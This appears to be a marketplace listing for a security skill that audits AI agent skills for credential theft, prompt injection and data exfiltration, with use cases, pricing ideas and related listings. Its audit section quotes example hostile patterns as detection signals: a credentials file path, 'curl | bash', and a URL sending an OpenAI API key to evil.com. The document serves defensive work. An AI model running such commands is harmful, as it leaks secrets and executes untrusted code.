dcl-skill-auditorScan any ClawHub skill before installing it. 534 out of 3,984 ClawHub skills contained critical vulnerabilities — credential theft, prompt injection, data exfiltration. Snyk Research, 2026. DCL Skill Auditor analyzes SKILL.md, scripts, and manifests against 30+ known attack patterns...
Install via ClawdBot CLI:
clawdbot install daririnch/dcl-skill-auditorGrade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
~/.aws/credentialsPotentially destructive shell commands in tool definitions
curl | bashCalls external URL not in known-safe list
https://evil.com/?key=$OPENAI_API_KEYAI Analysis
The skill is a security analysis tool that explicitly states it performs no external network calls and runs entirely within the agent's context. Its defined purpose is to detect malicious patterns in other skills, and the 'signals found' are examples of what it detects, not actions it performs itself.
Audited Apr 16, 2026 · audit v1.0
Generated May 21, 2026
Before integrating any new ClawHub skill into a multi-agent enterprise pipeline, DCL Skill Auditor scans the skill's SKILL.md, scripts, and manifest for credential theft, prompt injection, and data exfiltration patterns. This ensures that only secure skills are deployed, reducing the risk of compromised agent workflows in finance, healthcare, or legal sectors.
When a previously approved skill releases a new version, the auditor runs a differential analysis to detect behavioral drift or newly introduced malicious payloads. This prevents supply-chain attacks in SaaS platforms that rely on frequent skill updates.
Skill developers use the auditor to verify their own code before publishing to ClawHub, catching unintentional security flaws or malicious patterns that might have been inherited from third-party libraries. This improves trust and reduces friction during community review.
Organizations subject to compliance frameworks (e.g., SOC2, HIPAA, GDPR) use the auditor to generate immutable audit proofs for every skill installed in their AI agent environment. The cryptographic proof serves as evidence of pre-execution security checks.
After a security incident, forensic teams rerun the auditor on suspected skills to identify attack vectors and confirm whether the skill exfiltrated data. The reproducible audit hash allows cross-referencing with other deployments.
Offer basic static analysis (PASS/BLOCK) for free with a limited number of scans per month. Premium tiers unlock detailed WARN reports, CVE mapping, and batch processing for enterprise pipelines. Revenue from monthly subscriptions and annual enterprise contracts.
Partner with ClawHub or other agent skill marketplaces to integrate DCL Skill Auditor as a mandatory pre-publish gate. Charge marketplace operators a per-scan fee or a percentage of transaction revenue for skills passing audit. This creates a trusted skill ecosystem.
Bundle the auditor with DCL Policy Enforcer and Sentinel Trace into a compliance package for regulated industries. Provide consulting services for environment hardening, custom rule creation, and audit trail management. Revenue from service retainers and high-value implementation projects.
💬 Integration Tip
Integrate the auditor as a pre-deployment step in your CI/CD pipeline using the deterministic DCL proof—store the skill_hash and analysis_hash in your compliance database for immutable audit trails.
Scored Jul 9, 2026
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope,...
全面排查企业的经营风险情况,适用于供应商准入尽调、贷前风险筛查、合作伙伴背景调查等场景,全方位预警潜在经营风险,辅助决策者规避合作隐患。
Security scanner for AI agent skills. 9 built-in detection signatures. Identifies secrets, unsafe execution patterns, and prompt injection. Sub-50ms results.
Wallet anti-theft guard. One-click scan for high-risk wallet approvals to protect user assets. Use when a user asks for a wallet security check, wallet healt...
Comprehensive security audit for an agent's full skill stack. Chains scanner, differ, trust-verifier, and health-monitor into a single assessment with priori...
Audit and score OpenClaw AgentSkills against structural compliance, quality standards, and OpenClaw-specific architecture patterns. Produces a 0-100 score wi...